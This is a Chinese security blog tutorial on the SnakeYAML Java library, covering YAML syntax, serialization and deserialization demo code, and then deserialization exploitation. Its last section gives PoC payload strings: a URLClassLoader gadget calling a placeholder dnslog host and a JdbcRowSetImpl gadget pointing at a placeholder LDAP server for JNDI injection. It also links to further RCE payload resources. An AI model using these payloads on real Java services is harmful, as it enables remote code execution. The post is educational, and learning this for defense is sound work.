-
『Java安全』SnakeYAML反序列化利用基础
前言
YAML 是 “YAML Ain’t a Markup Language”(YAML 不是一种标记语言)的递归缩写。在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言)。
YAML 的语法和其他高级语言类似,并且可以简单表达清单、散列表,标量等数据形态。
SnakeYAML是Java的YAML解析库
YAML基础
菜鸟教程 YAML入门
https://www.runoob.com/w3cnote/yaml-intro.htmlYAML 对象键值对使用冒号结构表示 key: value,要求冒号之后必须有一个空格
a: &de - b: 1 - c: a b: e: 2 <<: *de- 1
- 2
- 3
- 4
- 5
- 6
-(空格)对象表示列表&alias打锚点,*alias引用锚点,<<插入到当前位置
依赖
<dependency> <groupId>org.yamlgroupId> <artifactId>snakeyamlartifactId> <version>1.18version> dependency>- 1
- 2
- 3
- 4
- 5
SnakeYAML序列化和反序列化基础
序列化
传入对象进行dump
Yaml.dump(Object obj)- 1
对于JavaBean的序列化:要保证有getter、setter和无参构造器
package demo; import org.yaml.snakeyaml.Yaml; public class Serial { public static void main(String[] args) throws Exception{ Student student = new Student("Bob", "114514"); student.addScore("math", 99); student.addScore("Chinese", 100); Yaml yaml = new Yaml(); String str = yaml.dump(student); System.out.println(str); } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
可以看到:YAML使用
!!xxx标明类名
反序列化
写一个demo解析
a: &de - b: 1 - c: a b: e: 2 <<: *de- 1
- 2
- 3
- 4
- 5
- 6
package demo; import org.yaml.snakeyaml.Yaml; import java.io.File; import java.io.FileInputStream; import java.util.HashMap; import java.util.Map; public class BasicDemo { public static void main(String[] args) throws Exception { Yaml yaml = new Yaml(); Map map = (HashMap)yaml.load(new FileInputStream(new File("src//main/java/demo/test.yml"))); System.out.println(map.get("a")); System.out.println(map.get("b")); } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
序列化一般使用以下方法,返回值一般是LinkedHashMap,里面的元素可以通过get或者迭代器取出来Yaml.load(String yaml) Yaml.load(InputStream io) Yaml.loadAs(String yaml, Class<T> type) Yaml.loadAll(Reader yaml)- 1
- 2
- 3
- 4
对于有多个对象的yaml,使用loadAll会返回
Iterable--- a: - b: 1 - c: a --- a: e: 2- 1
- 2
- 3
- 4
- 5
- 6
- 7
package demo; import org.yaml.snakeyaml.Yaml; import java.io.File; import java.io.FileInputStream; import java.util.HashMap; import java.util.Iterator; import java.util.Map; public class BasicDemo { public static void main(String[] args) throws Exception { Yaml yaml = new Yaml(); Iterable<Object> objects = yaml.loadAll(new FileInputStream(new File("src/main/java/demo/test.yml"))); for(Object obj: objects){ Map map = (HashMap) obj; System.out.println(map.get("a")); } } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
SnakeYAML反序列化利用
原理
!!指定类名,反序列化即可PoC
探测-触发dnslog
String str = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://xxxxxx.dnslog.cn\"]]]]\n"- 1
基于SPI的ScriptEngineManager触发RCE
https://github.com/artsploit/yaml-payload
JdbcRowSetImpl打jndi
String poc = "!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: \"ldap://xxx:1389/Exploit\"\n autoCommit: true";- 1
不出网利用
https://xz.aliyun.com/t/10655
完
欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/126404374
版权声明:本文为原创,转载时须注明出处及本声明 -
相关阅读:
html网页如何获取后台数据库的数据(html + ajax + php + mysql)
C/C++问题:一个指针的大小是多少?怎么理解指针变量的存在
2022年陕西省职称申报可以申报什么专业
网络安全(黑客)自学
如何搭建网课查题公众号?小白教程!内附免费题库接口
从混合云到分布式云 (上篇)
Hive sql中条件写在on和where的区别
使用注解的方式导出excel数据
结构体的简单介绍(3)——结构体的内存对齐
C. Crossword Validation(字典树)
- 原文地址:https://blog.csdn.net/Xxy605/article/details/126404374
